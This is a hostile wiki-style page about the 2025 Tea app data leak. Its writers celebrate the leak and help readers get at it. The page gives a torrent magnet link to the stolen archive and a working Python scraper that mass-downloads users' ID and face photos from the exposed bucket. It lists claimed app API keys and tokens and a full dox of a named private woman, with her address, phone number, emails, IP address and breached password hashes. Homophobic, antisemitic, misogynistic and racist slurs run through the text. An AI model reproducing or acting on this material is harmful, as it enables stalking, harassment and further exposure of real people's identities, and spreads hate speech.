Tea app leak
Tea app leak | |||||||
---|---|---|---|---|---|---|---|
![]() Some users of the app | |||||||
| |||||||
Belligerents | |||||||
|
![]() | ||||||
Units involved | |||||||
![]() |
![]() | ||||||
Casualties and losses | |||||||
![]() |
![]() |
On July 25, 2025, it was discovered that the app Tea, which women use to gossip about and defame men, was keeping private information about its users in a public Firebase bucket. This meant that anyone with the link could access it until it was made private again.
Background[edit | edit source]


Tea is an app created in 2023 by a gay guy named (((Sean Cook))).[1] Sean Cook stated in July 2025 that he was inspired to create the app because of his mother's experiences from online dating. Women use it to store information about dating partners with no verification as to whether it's true. In order to use the app, women would have to upload pictures of themselves and a government-issued ID. In July 2025, it shot up to the top of the App Store out of nowhere. It is thought that some government agency or NGO had something to do with this.[it just is, ok?]
Because the fag who created it (after checking his LinkedIn) claimed to study at UC Berkeley[2], but checking it reveals he only learnt a web development bootcamp, it is safe to say he vibe coded the website in an afternoon due to having no knowledge, which would explain the awful security.
Where to get the data[edit | edit source]
The bucket has been made private, but a full archive of all of the data is still available as a torrent. This is the FULL data leak and includes 72,000 images, as mentioned in their own blog. Paste this magnet link into your favorite torrent client o algo: magnet:?xt=urn:btih:brl45s3ysyotj6ljolmtnrlvfmyv4y7s&dn=tea&xl=59368985613&fc=57794
The leak[edit | edit source]
On July 25, 2025, a 4chan user discovered that all of the information about the app's users was kept in a public bucket.[3][4] 4cuck jannies took the thread down, but not before a Soyteen was able to copy and paste the text into a thread on /soy/. The thread included a link to the bucket and a script that downloaded its contents.[5] As expected, most of the women who used the app were fat and ugly. The bucket has since been made private.
Doxes[edit | edit source]
The app had thousands of users, all of whom had their information leaked and doxed. Listing all of them here would be impractical, so these are just the notable ones.
Ashley Marie Ghigliotti[marge, why are we 'oxing this literal who single mother][edit | edit source]
Single mother of two. Former model (but she's too old and dried up now geegggggg)[6]
Location: 130 69th St, Guttenberg, NJ, 07093 (40°47'34.1"N 74°00'17.6"W)
IP Address: 76.116.128.156 (most likely old)
Phone Number: (201)268-8389
Emails: ashleyghigs@gmail.com ashleyghigs4@gmail.com
Social Media: (https://www.tiktok.com/@ashleyghigs4 https://www.tiktok.com/@ashleyghigs https://www.tiktok.com/@wicked4chu) (https://www.instagram.com/ashleyghigs4/ https://www.instagram.com/ashleyghigs/ https://www.instagram.com/wicked4chu/) (https://x.com/ashleyghigs4 https://x.com/Wicked4chu) (https://story.snapchat.com/@wicked4chu) (https://www.threads.com/@ashleyghigs LOTS OF PICS HERE) (https://www.youtube.com/channel/UC77uF1PaWQ0jzz6Nvl7Gk9w?app=desktop) (https://www.twitch.tv/wicked4chu)
Business Profiles: https://www.linkedin.com/in/ashley-m-ghigliotti-a6014b92 https://campsite.bio/ashleyghigs4
Payment Apps: https://www.paypal.com/paypalme/ashleyghigs Cash App: $Wicked4Chu
Misc Sites: https://medium.com/@ashleyghigs4 https://www.pinterest.com/ashleyghigs/ https://www.pinterest.com/ashleyghigs4/ https://open.spotify.com/user/ashleyghigs https://www.amazon.com/hz/wishlist/ls/2359X91QP6TVM?ref_=wl_share
-
A soyteen downloading the data from the leak
(myfitnesspal.com USERNAME: ashleyghigs PASSWORD: NULL) (2021 Parkmobile.us USERNAME: ashleyghigs@gmail.com PASSWORD: $2a$05$4w7vTOmnv.oGWtDR2ChVR.birHi07LWmkE.85kC3rX4f9N0JjOj8m) (2019 Instantcheckmate.com USERNAME: ashleyghigs@gmail.com PASSWORD: c2NyeXB0AA4AAAAIAAAAAQPURlnB1SnirEOOR+eYqw6PRmj/cGuef+IGyuz8N6GaKgasQsHAV1Z8OPJ5TyXH0KjpSTUXGuz0T5gllfOBAd7D+SHTmgEO4t410mDBPgMn) |
Possible admin dev key leaks[edit | edit source]
One soyteen posted what he claimed were the admins' dev keys. This information may be false, Though.
afDevKey=WDD488TccmDWWkEpJPytfD
appleStoreId=6444453051
androidSegmentWriteKey=TVyzCf9S3cATwD8V3TimEBzIzhHVsLMc
iosSegmentWriteKey=dWM3U1jmBA07OZJ2JZZgO9aeSXivQxFG
sentryDsn="https://cc742df4957ce54acbf0d688da1f62a5@o4507273518383104.ingest.us.sentry.io/4507300875730944";
revenueCatGoogleKey="goog_bzJjOcIsIlbgPEPxqqyYFnHOpRO"
revenueCatAppleKey="appl_rsLNTxdGpbHpPbTNBwxKywXsVHU"
apiUrl="https://api.teatheapp.com";
# apiUrl="http://192.168.15.7:3333";
# socketUrl="https://hermes.teatheapp.com";
socketToken="bc125b256c35adf76ae4d2a1f8cdd189"
mapboxAccessToken='pk.eyJ1IjoidGVhZGV2IiwiYSI6ImNtNGg2eDR1ZzAxOTMyanBvYWhiMnd6b3IifQ.w0uY-e6SEkxdeFkd-NZySA'
taraId='46a32ac1-a20d-4130-805c-37c06ec781b8'
giphyApiKey='RHfKLfCpTB78MynBhv4bXdw3PcdhtNCv'
Scraping script[edit | edit source]
#!/usr/bin/env python3 # # HAPPENING: TEA APP DOXXES ALL ITS USERS! # DRIVERS LICENSES AND FACE PICS! # # This script scrapes all image attachments from the public firebase storage # bucket that the morons over at Tea App have been uploading everyone's # drivers licenses and verification pics to. # # This is what happens when you entrust your personal information to a bunch # of vibe coding dipshits who are hellbent on destroying Western birthrates even # further. # # By default, this script dumps images to the directory "dump". # You can configure this by changing OUTPUT_DIR below. # # You need requests to run this script: # $ pip install requests # # - Regards, anon import os import requests from requests import Response from typing import Dict OUTPUT_DIR: str = 'dump' BASE_URL: str = 'https://firebasestorage.googleapis.com/v0/b/tea-the-app.appspot.com/o/' pageToken: str = '' def main() -> None: if not os.path.exists(OUTPUT_DIR): os.mkdir(OUTPUT_DIR) while True: # get page resp: Response = requests.get( BASE_URL, params={'pageToken': pageToken}, ) if resp.status_code != 200: print("Page request failed, code " + str(resp.status_code)) break resp_json: Dict[str, str] = resp.json() # download attachments for item in resp_json['items']: fname: str = item['name'] if not fname.startswith('attachments/'): continue outpath: str = OUTPUT_DIR + '/' + fname.split('/')[1] + '.jpg' print(outpath) if os.path.isfile(outpath): # skip files we already have continue img_resp: Response = requests.get( BASE_URL + fname.replace('/', '%2F'), params={'alt': 'media'}, stream=True, ) if img_resp.status_code != 200: continue with open(outpath, 'wb') as f: f.write(img_resp.content) # next page try: pageToken: str = resp_json['nextPageToken'] except KeyError as e: print(f"done: {e}") break if __name__ == "__main__": main()
Teaspill[edit | edit source]
Someone made a website called Teaspill where you can rate all the foids who got their photos leaked. Most of the top 50 are actually pretty hot, but the bottom 50 are all ugly as fuck, mostly niggers.
See also[edit | edit source]
Citations
- ↑ www.teaforwomen.com
- ↑ https://www.linkedin.com/in/seancook1
- ↑ https://archive.4plebs.org/pol/thread/511313558/
- ↑ https://archive.4plebs.org/pol/thread/511317913/
- ↑ https://megalodon.jp/2025-0726-0351-51/https://www.soyjak.st:443/soy/thread/12325055.html
- ↑ https://megalodon.jp/2025-0726-0359-30/https://www.soyjak.st:443/raid/thread/206541.html
- ↑ https://megalodon.jp/2025-0727-0627-24/https://www.soyjak.st:443/qa/thread/683732.html